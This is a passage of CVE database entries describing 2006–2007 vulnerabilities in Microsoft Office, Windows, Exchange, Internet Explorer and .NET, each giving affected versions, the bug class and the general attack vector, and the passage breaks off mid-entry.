Unspecified vulnerability in Microsoft Word allows user-assisted remote attackers to execute arbitrary code on Word 2000, and cause a denial of service on Word 2003, via unknown attack vectors that trigger memory corruption, as exploited by Trojan.Mdropper.W and later by Trojan.Mdropper.X, a different issue than CVE-2006-6456, CVE-2006-5994, and CVE-2006-6561. [CVE-2007-0351] Microsoft Windows XP and Windows Server 2003 do not properly handle user logoff, which might allow local users to gain the privileges of a previous system user, possibly related to user profile unload failure. NOTE: it is not clear whether this is an issue in Windows itself, or an interaction with another product. The issue might involve ZoneAlarm not being able to terminate processes when it cannot prompt the user. [CVE-2007-0221] Integer overflow in the IMAP (IMAP4) support in Microsoft Exchange Server 2000 SP3 allows remote attackers to cause a denial of service (service hang) via crafted literals in an IMAP command, aka the "IMAP Literal Processing Vulnerability." [CVE-2007-0220] Cross-site scripting (XSS) vulnerability in Outlook Web Access (OWA) in Microsoft Exchange Server 2000 SP3, and 2003 SP1 and SP2 allows remote attackers to execute arbitrary scripts, spoof content, or obtain sensitive information via certain UTF-encoded, script-based e-mail attachments, involving an "incorrectly handled UTF character set label". [CVE-2007-0216] wkcvqd01.dll in Microsoft Works 6 File Converter, as used in Office 2003 SP2, Works 8.0, and Works Suite 2005, allows remote attackers to execute arbitrary code via a .wps file with crafted section length headers, aka "Microsoft Works File Converter Input Validation Vulnerability." [CVE-2007-0215] Stack-based buffer overflow in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, and 2003 Viewer allows user-assisted remote attackers to execute arbitrary code via a .XLS BIFF file with a malformed Named Graph record, which results in memory corruption. [CVE-2007-0214] The HTML Help ActiveX control (Hhctrl.ocx) in Microsoft Windows 2000 SP3, XP SP2 and Professional, 2003 SP1 allows remote attackers to execute arbitrary code via unspecified functions, related to uninitialized parameters. [CVE-2007-0213] Microsoft Exchange Server 2000 SP3, 2003 SP1 and SP2, and 2007 does not properly decode certain MIME encoded e-mails, which allows remote attackers to execute arbitrary code via a crafted base64-encoded MIME e-mail message. [CVE-2007-0211] The hardware detection functionality in the Windows Shell in Microsoft Windows XP SP2 and Professional, and Server 2003 SP1 allows local users to gain privileges via an unvalidated parameter to a function related to the "detection and registration of new hardware." [CVE-2007-0209] Microsoft Word in Office 2000 SP3, XP SP3, Office 2003 SP2, Works Suite 2004 to 2006, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via a Word file with a malformed drawing object, which leads to memory corruption. [CVE-2007-0208] Microsoft Word in Office 2000 SP3, XP SP3, Office 2003 SP2, Works Suite 2004 to 2006, and Office 2004 for Mac does not correctly check the properties of certain documents and warn the user of macro content, which allows user-assisted remote attackers to execute arbitrary code. [CVE-2007-0069] Unspecified vulnerability in the kernel in Microsoft Windows XP SP2, Server 2003, and Vista allows remote attackers to cause a denial of service (CPU consumption) and possibly execute arbitrary code via crafted (1) IGMPv3 and (2) MLDv2 packets that trigger memory corruption, aka "Windows Kernel TCP/IP/IGMPv3 and MLDv2 Vulnerability." [CVE-2007-0066] The kernel in Microsoft Windows 2000 SP4, XP SP2, and Server 2003, when ICMP Router Discovery Protocol (RDP) is enabled, allows remote attackers to cause a denial of service via fragmented router advertisement ICMP packets that trigger an out-of-bounds read, aka "Windows Kernel TCP/IP/ICMP Vulnerability." [CVE-2007-0065] Heap-based buffer overflow in Object Linking and Embedding (OLE) Automation in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, Office 2004 for Mac, and Visual basic 6.0 SP6 allows remote attackers to execute arbitrary code via a crafted script request. [CVE-2007-0064] Heap-based buffer overflow in Windows Media Format Runtime 7.1, 9, 9.5, 9.5 x64 Edition, 11, and Windows Media Services 9.1 for Microsoft Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2007-0043] The Just In Time (JIT) Compiler service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer," probably a buffer overflow, aka ".NET JIT Compiler Vulnerability". [CVE-2007-0042] Interpretation conflict in ASP.NET in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to access configuration files and obtain sensitive information, and possibly bypass security mechanisms that try to constrain the final substring of a string, via %00 characters, related to use of %00 as a string terminator within POSIX functions but a data character within .NET strings, aka "Null Byte Termination Vulnerability." [CVE-2007-0041] The PE Loader service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer" and unvalidated message lengths, probably a buffer overflow. [CVE-2007-0040] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4, Server 2003 SP1 and SP2, Server 2003 x64 Edition and SP2, and Server 2003 for Itanium-based Systems SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted LDAP request with an unspecified number of "convertible attributes." [CVE-2007-0039] The Exchange Collaboration Data Objects (EXCDO) functionality in Microsoft Exchange Server 2000 SP3, 2003 SP1 and SP2, and 2007 allows remote attackers to cause a denial of service (crash) via an Internet Calendar (iCal) file containing multiple X-MICROSOFT-CDO-MODPROPS (MODPROPS) properties in which the second MODPROPS is longer than the first, which triggers a NULL pointer dereference and an unhandled exception. [CVE-2007-0038] Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a large length value in the second (or later) anih block of a RIFF .ANI, cur, or .ico file, which results in memory corruption when processing cursors, animated cursors, and icons, a variant of CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this might be a duplicate of CVE-2007-1765 [CVE-2007-0035] Word (or Word Viewer) in Microsoft Office 2000 SP3, XP SP3, 2003 SP2, 2004 for Mac, and Works Suite 2004, 2005, and 2006 does not properly handle data in a certain array, which allows user-assisted remote attackers to execute arbitrary code, aka the "Word Array Overflow Vulnerability." [CVE-2007-0034] Buffer overflow in the Advanced Search (Finder.exe) feature of Microsoft Outlook 2000, 2002, and 2003 allows user-assisted remote attackers to execute arbitrary code via a crafted Outlook Saved Searches (OSS) file that triggers memory corruption, aka "Microsoft Outlook Advanced Find Vulnerability." [CVE-2007-0033] Microsoft Outlook 2002 and 2003 allows user-assisted remote attackers to execute arbitrary code via a malformed VEVENT record in an .iCal meeting request or ICS file. [CVE-2007-0031] Heap-based buffer overflow in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and v.X for Mac allows user-assisted remote attackers to execute arbitrary code via a BIFF8 spreadsheet with a PALETTE record that contains a large number of entries. [CVE-2007-0030] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and v.X for Mac allows user-assisted remote attackers to execute arbitrary code via an Excel file with an out-of-range Column field in certain BIFF8 record types, which references arbitrary memory. [CVE-2007-0029] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and v.X for Mac allows user-assisted remote attackers to execute arbitrary code via a malformed string, aka "Excel Malformed String Vulnerability." [CVE-2007-0028] Microsoft Excel 2000, 2002, 2003, Viewer 2003, Office 2004 for Mac, and Office v.X for Mac does not properly handle certain opcodes, which allows user-assisted remote attackers to execute arbitrary code via a crafted XLS file, which results in an "Improper Memory Access Vulnerability." NOTE: an early disclosure of this issue used CVE-2006-3432, but only CVE-2007-0028 should be used. [CVE-2007-0027] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and v.X for Mac allows remote attackers to execute arbitrary code via malformed IMDATA records that trigger memory corruption. [CVE-2007-0026] The OLE Dialog component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 allows user-assisted remote attackers to execute arbitrary code via an RTF file with a malformed OLE object that triggers memory corruption. [CVE-2007-0025] The MFC component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 and Visual Studio .NET 2000, 2002 SP1, 2003, and 2003 SP1 allows user-assisted remote attackers to execute arbitrary code via an RTF file with a malformed OLE object that triggers memory corruption. NOTE: this might be due to a stack-based buffer overflow in the AfxOleSetEditMenu function in MFC42u.dll. [CVE-2007-0024] Integer overflow in the Vector Markup Language (VML) implementation (vgx.dll) in Microsoft Internet Explorer 5.01, 6, and 7 on Windows 2000 SP4, XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted web page that contains unspecified integer properties that cause insufficient memory allocation and trigger a buffer overflow, aka the "VML Buffer Overrun Vulnerability." [CVE-2006-7210] Microsoft Windows 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (cpu consumption) via a PNG image with crafted (1) Width and (2) Height values in the IHDR block. [CVE-2006-7192] Microsoft ASP .NET Framework 2.0.50727.42 does not properly handle comment (/* /) enclosures, which allows remote attackers to bypass request filtering and conduct cross-site scripting (XSS) attacks, or cause a denial of service, as demonstrated via an xss:expression STYLE attribute in a closing XSS HTML tag. [CVE-2006-7027] Microsoft Internet Security and Acceleration (ISA) Server 2004 logs unusual ASCII characters in the Host header, including the tab, which allows remote attackers to manipulate portions of the log file and possibly leverage this for other attacks. [CVE-2006-6723] The Workstation service in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to cause a denial of service (memory consumption) via a large maxlen value in an NetrWkstaUserEnum RPC request. [CVE-2006-6696] Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with a MB_SERVICE_NOTIFICATION message with crafted data, which sends a HardError message to Client/Server Runtime Server Subsystem (CSRSS) process, which is not properly handled when invoking the UserHardError and GetHardErrorText functions in WINSRV.DLL. [CVE-2006-6617] projectserver/logon/pdsrequest.asp in Microsoft Project Server 2003 allows remote authenticated users to obtain the MSProjectUser password for a SQL database via a GetInitializationData request, which includes the information in the UserName and Password tags of the response. [CVE-2006-6561] Unspecified vulnerability in Microsoft Word 2000, 2002, and Word Viewer 2003 allows user-assisted remote attackers to execute arbitrary code via a crafted DOC file that triggers memory corruption, as demonstrated via the 12122006-djtest.doc file, a different issue than CVE-2006-5994 and CVE-2006-6456. [CVE-2006-6456] Unspecified vulnerability in Microsoft Word 2000, 2002, and 2003 and Word Viewer 2003 allows remote attackers to execute code via unspecified vectors related to malformed data structures that trigger memory corruption, a different vulnerability than CVE-2006-5994. [CVE-2006-6296] The RpcGetPrinterData function in the Print Spooler (spoolsv.exe) service in Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via an RPC request that specifies a large 'offered' value (output buffer size), a variant of CVE-2005-3644. [CVE-2006-6134] Heap-based buffer overflow in the WMCheckURLScheme function in WMVCORE.DLL in Microsoft Windows Media Player (WMP) 10.00.00.4036 on Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to cause a denial of service (application crash) and execute arbitrary code via a long HREF attribute, using an unrecognized protocol, in a REF element in an ASX PlayList file. [CVE-2006-6133] Stack-based buffer overflow in Visual Studio Crystal Reports for Microsoft Visual Studio .NET 2002 and 2002 SP1, .NET 2003 and 2003 SP1, and 2005 and 2005 SP1 (formerly Business Objects Crystal Reports XI Professional) allows user-assisted remote attackers to execute arbitrary code via a crafted RPT file. [CVE-2006-5994] Unspecified vulnerability in Microsoft Word 2000 and 2002, Office Word and Word Viewer 2003, Word 2004 and 2004 v. X for Mac, and Works 2004, 2005, and 2006 allows remote attackers to execute arbitrary code via a Word document with a malformed string that triggers memory corruption, a different vulnerability than CVE-2006-6456. [CVE-2006-5758] The Graphics Rendering Engine in Microsoft Windows 2000 through 2000 SP4 and Windows XP through SP2 maps GDI Kernel structures on a global shared memory section that is mapped with read-only permissions, but can be remapped by other processes as read-write, which allows local users to cause a denial of service (memory corruption and crash) and gain privileges by modifying the kernel structures. [CVE-2006-5586] The Graphics Rendering Engine in Microsoft Windows 2000 SP4 and XP SP2 allows local users to gain privileges via "invalid application window sizes" in layered application windows, aka the "GDI Invalid Window Size Elevation of Privilege Vulnerability." [CVE-2006-5585] The Client-Server Run-time Subsystem in Microsoft Windows XP SP2 and Server 2003 allows local users to gain privileges via a crafted file manifest within an application, aka "File Manifest Corruption Vulnerability." [CVE-2006-5584] The Remote Installation Service (RIS) in Microsoft Windows 2000 SP4 uses a TFTP server that allows anonymous access, which allows remote attackers to upload and overwrite arbitrary files to gain privileges on systems that use RIS. [CVE-2006-5583] Buffer overflow in the SNMP Service in Microsoft Windows 2000 SP4, XP SP2, Server 2003, Server 2003 SP1, and possibly other versions allows remote attackers to execute arbitrary code via a crafted SNMP packet, aka "SNMP Memory Corruption Vulnerability." [CVE-2006-5574] Unspecified vulnerability in the Brazilian Portuguese Grammar Checker in Microsoft Office 2003 and the Multilingual Interface for Office 2003, Project 2003, and Visio 2003 allows user-assisted remote attackers to execute arbitrary code via crafted text that is not properly parsed. [CVE-2006-5296] PowerPoint in Microsoft Office 2003 does not properly handle a container object whose position value exceeds the record length, which allows user-assisted attackers to cause a denial of service (NULL dereference and application crash) via a crafted PowerPoint (.PPT) file, as demonstrated by Nanika.ppt, and a different vulnerability than CVE-2006-3435, CVE-2006-3876, CVE-2006-3877, and CVE-2006-4694. NOTE: the impact of this issue was originally claimed to be arbitrary code execution, but later analysis demonstrated that this was erroneous. [CVE-2006-4854] * REJECT Unspecified vulnerability in Microsoft Office 2000 (Chinese Edition) and Microsoft PowerPoint 2000 (Chinese Edition) allows user-assisted attackers to execute arbitrary code via a crafted PPT document, as exploited by malware such as Trojan.PPDropper.E. NOTE: on 20060919, Microsoft notified CVE that this is a duplicate of CVE-2006-0009. [CVE-2006-4704] Cross-zone scripting vulnerability in the WMI Object Broker (WMIScriptUtils.WMIObjectBroker2) ActiveX control (WmiScriptUtils.dll) in Microsoft Visual Studio 2005 allows remote attackers to bypass Internet zone restrictions and execute arbitrary code by instantiating dangerous objects, aka "WMI Object Broker Vulnerability." [CVE-2006-4702] Buffer overflow in the Windows Media Format Runtime in Microsoft Windows Media Player (WMP) 6.4 and Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2006-4696] Unspecified vulnerability in the Server service in Microsoft Windows 2000 SP4, Server 2003 SP1 and earlier, and XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted packet, aka "SMB Rename Vulnerability." [CVE-2006-4695] Unspecified vulnerability in certain COM objects in Microsoft Office Web Components 2000 allows user-assisted remote attackers to execute arbitrary code via a crafted URL, aka "Office Web Components URL Parsing Vulnerability." [CVE-2006-4694] Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office XP and Office 2003 allows user-assisted attackers to execute arbitrary code via a crafted record in a PPT file, as exploited by malware such as Exploit:Win32/Controlppt.W, Exploit:Win32/Controlppt.X, and Exploit-PPT.d/Trojan.PPDropper.F. NOTE: it has been reported that the attack vector involves SlideShowWindows.View.GotoNamedShow. [CVE-2006-4693] Unspecified vulnerability in Microsoft Word 2004 for Mac and v.X for Mac allows remote user-assisted attackers to execute arbitrary code via a crafted string in a Word file, a different issue than CVE-2006-3647 and CVE-2006-3651. [CVE-2006-4692] Argument injection vulnerability in the Windows Object Packager (packager.exe) in Microsoft Windows XP SP1 and SP2 and Server 2003 SP1 and earlier allows remote user-assisted attackers to execute arbitrary commands via a crafted file with a "/" (slash) character in the filename of the Command Line property, followed by a valid file extension, which causes the command before the slash to be executed, aka "Object Packager Dialogue Spoofing Vulnerability." [CVE-2006-4691] Stack-based buffer overflow in the NetpManageIPCConnect function in the Workstation service (wkssvc.dll) in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to execute arbitrary code via NetrJoinDomain2 RPC messages with a long hostname. [CVE-2006-4689] Unspecified vulnerability in the driver for the Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to cause a denial of service (hang and reboot) via has unknown attack vectors, aka "NetWare Driver Denial of Service Vulnerability." [CVE-2006-4688] Buffer overflow in Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via crafted messages, aka "Client Service for NetWare Memory Corruption Vulnerability." [CVE-2006-4534] Unspecified vulnerability in Microsoft Word 2000, 2002, and Office 2003 allows remote user-assisted attackers to execute arbitrary code via unspecified vectors involving a crafted file resulting in a malformed stack, as exploited by malware with names including Trojan.Mdropper.Q, Mofei, and Femo. [CVE-2006-4495] Microsoft Internet Explorer allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code by instantiating certain Windows 2000 ActiveX COM Objects including (1) ciodm.dll, (2) myinfo.dll, (3) msdxm.ocx, and (4) creator.dll. [CVE-2006-4274] REJECT Unknown vulnerability in Microsoft PowerPoint allows user-assisted attackers to execute arbitrary code via a crafted PPT document, as exploited by malware such as TROJ_MDROPPER.BH. NOTE: on 20060822, it was determined that TROJ_MDROPPER.BH was exploiting CVE-2006-0009, so this is not a new vulnerability. [CVE-2006-4219] The Terminal Services COM object (tsuserex.dll) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code by instantiating it as an ActiveX object in Internet Explorer 6.0 SP1 on Microsoft Windows 2003 EE SP1 CN. [CVE-2006-4183] Heap-based buffer overflow in Microsoft DirectX SDK (February 2006) and probably earlier, including 9.0c End User Runtimes, allows context-dependent attackers to execute arbitrary code via a crafted Targa file with a run-length-encoding (RLE) compression that produces more data than expected when decoding. [CVE-2006-4071] Sign extension vulnerability in the createBrushIndirect function in the GDI library (gdi32.dll) in Microsoft Windows XP, Server 2003, and possibly other versions, allows user-assisted attackers to cause a denial of service (application crash) via a crafted WMF file. [CVE-2006-3992] Unspecified vulnerability in the Centrino (1) w22n50.sys, (2) w22n51.sys, (3) w29n50.sys, and (4) w29n51.sys Microsoft Windows drivers for Intel 2200BG and 2915ABG PRO/Wireless Network Connection before 10.5 with driver 9.0.4.16 allows remote attackers to execute arbitrary code via certain frames that trigger memory corruption. [CVE-2006-3942] The server driver (srv.sys) in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (system crash) via an SMB_COM_TRANSACTION SMB message that contains a string without null character termination, which leads to a NULL dereference in the ExecuteTransaction function, possibly related to an "SMB PIPE," aka the "Mailslot DOS" vulnerability. NOTE: the name "Mailslot DOS" was derived from incomplete initial research [CVE-2006-3897] Stack overflow in Microsoft Internet Explorer 6 on Windows 2000 allows remote attackers to cause a denial of service (application crash) by creating an NMSA.ASFSourceMediaDescription.1 ActiveX object with a long dispValue property. [CVE-2006-3880] DISPUTED Microsoft Windows NT 4.0, Windows 2000, Windows XP, and Windows Small Business Server 2003 allow remote attackers to cause a denial of service (IP stack hang) via a continuous stream of packets on TCP port 135 that have incorrect TCP header checksums and random numbers in certain TCP header fields, as demonstrated by the Achilles Windows Attack Tool. NOTE: the researcher reports that the Microsoft Security Response Center has stated "Our investigation which has included code review, review of the TCPDump, and attempts on reproing the issue on multiple fresh installs of various Windows Operating Systems have all resulted in non confirmation." [CVE-2006-3877] Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office 2002, Office 2003, Office 2004 for Mac, and Office v.X for Mac allows user-assisted attackers to execute arbitrary code via an unspecified "crafted file," a different vulnerability than CVE-2006-3435, CVE-2006-4694, and CVE-2006-3876. [CVE-2006-3876] Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office 2002, Office 2003, Office 2004 for Mac, and Office v.X for Mac allows user-assisted attackers to execute arbitrary code via a crafted Data record in a PPT file, a different vulnerability than CVE-2006-3435 and CVE-2006-4694. [CVE-2006-3875] Unspecified vulnerability in Microsoft Excel 2000, 2002, 2003, 2004 for Mac, v.X for Mac, and Excel Viewer 2003 allows user-assisted attackers to execute arbitrary code via a crafted COLINFO record in an XLS file, a different vulnerability than CVE-2006-2387 and CVE-2006-3867. [CVE-2006-3873] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060912, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL in a GZIP-encoded website that was the target of an HTTP redirect, due to an incomplete fix for CVE-2006-3869. [CVE-2006-3869] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060824, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL on a website that uses HTTP 1.1 compression. [CVE-2006-3868] Unspecified vulnerability in Microsoft Office XP and 2003 allows remote user-assisted attackers to execute arbitrary code via a malformed Smart Tag. [CVE-2006-3867] Unspecified vulnerability in Microsoft Excel 2000, 2002, 2003, 2004 for Mac, v.X for Mac, and Excel Viewer 2003 allows user-assisted attackers to execute arbitrary code via a crafted Lotus 1-2-3 file, a different vulnerability than CVE-2006-2387 and CVE-2006-3875. [CVE-2006-3864] Unspecified vulnerability in mso.dll in Microsoft Office 2000, XP, and 2003, and Microsoft PowerPoint 2000, XP, and 2003, allows remote user-assisted attackers to execute arbitrary code via a malformed record in a (1) .DOC, (2) .PPT, or (3) .XLS file that triggers memory corruption, related to an "array boundary condition" (possibly an array index overflow), a different vulnerability than CVE-2006-3434, CVE-2006-3650, and CVE-2006-3868. [CVE-2006-3841] Cross-site scripting (XSS) vulnerability in WebScarab before 20060718-1904, when used with Microsoft Internet Explorer 6 SP2 or Konqueror 3.5.3, allows remote attackers to inject arbitrary web script or HTML via the URL, which is not sanitized before being returned in an error message when WebScarab is not able to access the URL. [CVE-2006-3660] Unspecified vulnerability in Microsoft PowerPoint 2003 has unknown impact and user-assisted attack vectors related to powerpnt.exe. NOTE: due to the lack of available details as of 20060717, it is unclear how this is related to CVE-2006-3655, CVE-2006-3656, and CVE-2006-3590, although it is possible that they are all different. [CVE-2006-3656] Unspecified vulnerability in Microsoft PowerPoint 2003 allows user-assisted attackers to cause memory corruption via a crafted PowerPoint file, which triggers the corruption when the file is closed. NOTE: due to the lack of available details as of 20060717, it is unclear how this is related to CVE-2006-3655, CVE-2006-3660, and CVE-2006-3590, although it is possible that they are all different. [CVE-2006-3655] Unspecified vulnerability in mso.dll in Microsoft PowerPoint 2003 allows user-assisted attackers to execute arbitrary code via a crafted PowerPoint file. NOTE: due to the lack of available details as of 20060717, it is unclear how this is related to CVE-2006-3656, CVE-2006-3660, and CVE-2006-3590, although it is possible that they are all different. [CVE-2006-3652] Microsoft Internet Security and Acceleration (ISA) Server 2004 allows remote attackers to bypass file extension filters via a request with a trailing "#" character. NOTE: as of 20060715, this could not be reproduced by third parties. [CVE-2006-3651] Unspecified vulnerability in Microsoft Word 2000, 2002, and Office 2003 allows remote user-assisted attackers to execute arbitrary code via a crafted mail merge file, a different vulnerability than CVE-2006-3647 and CVE-2006-4693. [CVE-2006-3650] Microsoft Office 2000, XP, 2003, 2004 for Mac, and v.X for Mac do not properly parse the length of a chart record, which allows remote user-assisted attackers to execute arbitrary code via a Word document with an embedded malformed chart record that triggers an overwrite of pointer values with values from the document, a different vulnerability than CVE-2006-3434, CVE-2006-3864, and CVE-2006-3868. [CVE-2006-3649] Buffer overflow in Microsoft Visual Basic for Applications (VBA) SDK 6.0 through 6.4, as used by Microsoft Office 2000 SP3, Office XP SP3, Project 2000 SR1, Project 2002 SP1, Access 2000 Runtime SP3, Visio 2002 SP2, and Works Suite 2004 through 2006, allows user-assisted attackers to execute arbitrary code via unspecified document properties that are not verified when VBA is invoked to open documents. [CVE-2006-3648] Unspecified vulnerability in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 and 2003 SP1, allows remote attackers to execute arbitrary code via unspecified vectors involving unhandled exceptions, memory resident applications, and incorrectly "unloading chained exception." [CVE-2006-3647] Integer overflow in Microsoft Word 2000, 2002, 2003, 2004 for Mac, and v.X for Mac allows remote user-assisted attackers to execute arbitrary code via a crafted string in a Word document, which overflows a 16-bit integer length value, aka "Memmove Code Execution," a different vulnerability than CVE-2006-3651 and CVE-2006-4693. [CVE-2006-3643] Cross-site scripting (XSS) vulnerability in Internet Explorer 5.01 and 6 in Microsoft Windows 2000 SP4 permits access to local "HTML-embedded resource files" in the Microsoft Management Console (MMC) library, which allows remote authenticated users to execute arbitrary commands, aka "MMC Redirect Cross-Site Scripting Vulnerability." [CVE-2006-3590] mso.dll, as used by Microsoft PowerPoint 2000 through 2003, allows user-assisted attackers to execute arbitrary commands via a malformed shape container in a PPT file that leads to memory corruption, as exploited by Trojan.PPDropper.B, a different issue than CVE-2006-1540 and CVE-2006-3493. [CVE-2006-3510] The Remote Data Service Object (RDS.DataControl) in Microsoft Internet Explorer 6 on Windows 2000 allows remote attackers to cause a denial of service (crash) via a series of operations that result in an invalid length calculation when using SysAllocStringLen, then triggers a buffer over-read. [CVE-2006-3493] Buffer overflow in LsCreateLine function (mso_203) in mso.dll and mso9.dll, as used by Microsoft Word and possibly other products in Microsoft Office 2003, 2002, and 2000, allows remote user-assisted attackers to cause a denial of service (crash) via a crafted Word DOC or other Office file type. NOTE: this issue was originally reported to allow code execution, but on 20060710 Microsoft stated that code execution is not possible, and the original researcher agrees. [CVE-2006-3449] Unspecified vulnerability in Microsoft PowerPoint 2000 through 2003, possibly a buffer overflow, allows user-assisted remote attackers to execute arbitrary commands via a malformed record in the BIFF file format used in a PPT file, a different issue than CVE-2006-1540, aka "Microsoft PowerPoint Malformed Record Vulnerability." [CVE-2006-3448] Buffer overflow in the Step-by-Step Interactive Training in Microsoft Windows 2000 SP4, XP SP2 and Professional, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a long Syllabus string in crafted bookmark link files (cbo, cbl, or .cbm), a different issue than CVE-2005-1212. [CVE-2006-3445] Integer overflow in the ReadWideString function in agentdpv.dll in Microsoft Agent on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via a large length value in an .ACF file, which results in a heap-based buffer overflow. [CVE-2006-3444] Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, probably a buffer overflow, allows local users to obtain privileges via unspecified vectors involving an "unchecked buffer." [CVE-2006-3443] Untrusted search path vulnerability in Winlogon in Microsoft Windows 2000 SP4, when SafeDllSearchMode is disabled, allows local users to gain privileges via a malicious DLL in the UserProfile directory, aka "User Profile Elevation of Privilege Vulnerability." [CVE-2006-3441] Buffer overflow in the DNS Client service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted record response. NOTE: while MS06-041 implies that there is a single issue, there are multiple vectors, and likely multiple vulnerabilities, related to (1) a heap-based buffer overflow in a DNS server response to the client, (2) a DNS server response with malformed ATMA records, and (3) a length miscalculation in TXT, HINFO, X25, and ISDN records. [CVE-2006-3440] Buffer overflow in the Winsock API in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka "Winsock Hostname Vulnerability." [CVE-2006-3439] Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314. [CVE-2006-3436] Cross-site scripting (XSS) vulnerability in Microsoft .NET Framework 2.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving "ASP.NET controls that set the AutoPostBack property to true". [CVE-2006-3435] PowerPoint in Microsoft Office 2000, XP, 2003, 2004 for Mac, and v.X for Mac does not properly parse the slide notes field in a document, which allows remote user-assisted attackers to execute arbitrary code via crafted data in this field, which triggers an erroneous object pointer calculation that uses data from within the document. NOTE: this issue is different than other PowerPoint vulnerabilities including CVE-2006-4694. [CVE-2006-3434] Unspecified vulnerability in Microsoft Office 2000, XP, 2003, 2004 for Mac, and v.X for Mac allows remote user-assisted attackers to execute arbitrary code via a crafted string that triggers memory corruption. [CVE-2006-3431] Buffer overflow in certain Asian language versions of Microsoft Excel might allow user-assisted attackers to execute arbitrary code via a crafted STYLE record in a spreadsheet that triggers the overflow when the user attempts to repair the document or selects the "Style" option, as demonstrated by nanika.xls. NOTE: Microsoft has confirmed to CVE via e-mail that this is different than the other Excel vulnerabilities announced before 20060707, including CVE-2006-3059 and CVE-2006-3086. [CVE-2006-3059] Unspecified vulnerability in Microsoft Excel 2000 through 2004 allows remote user-assisted attackers to execute arbitrary code via unspecified vectors. NOTE: this is a different vulnerability than CVE-2006-3086. [CVE-2006-2492] Buffer overflow in Microsoft Word in Office 2000 SP3, Office XP SP3, Office 2003 Sp1 and SP2, and Microsoft Works Suites through 2006, allows user-assisted attackers to execute arbitrary code via a malformed object pointer, as originally reported by ISC on 20060519 for a zero-day attack. [CVE-2006-2389] Unspecified vulnerability in Microsoft Office 2003 SP1 and SP2, Office XP SP3, Office 2000 SP3, and other products, allows user-assisted attackers to execute arbitrary code via an Office file with a malformed property that triggers memory corruption related to record lengths, aka "Microsoft Office Property Vulnerability," a different vulnerability than CVE-2006-1316. [CVE-2006-2388] Microsoft Office Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via malformed cell comments, which lead to modification of "critical data offsets" during the rebuilding process. [CVE-2006-2387] Unspecified vulnerability in Microsoft Excel 2000, 2002, 2003, 2004 for Mac, v.X for Mac, Excel Viewer 2003, and Microsoft Works Suite 2004 through 2006 allows user-assisted attackers to execute arbitrary code via a crafted DATETIME record in an XLS file, a different vulnerability than CVE-2006-3867 and CVE-2006-3875. [CVE-2006-2380] Microsoft Windows 2000 SP4 does not properly validate an RPC server during mutual authentication over SSL, which allows remote attackers to spoof an RPC server, aka the "RPC Mutual Authentication Vulnerability." [CVE-2006-2379] Buffer overflow in the TCP/IP Protocol driver in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 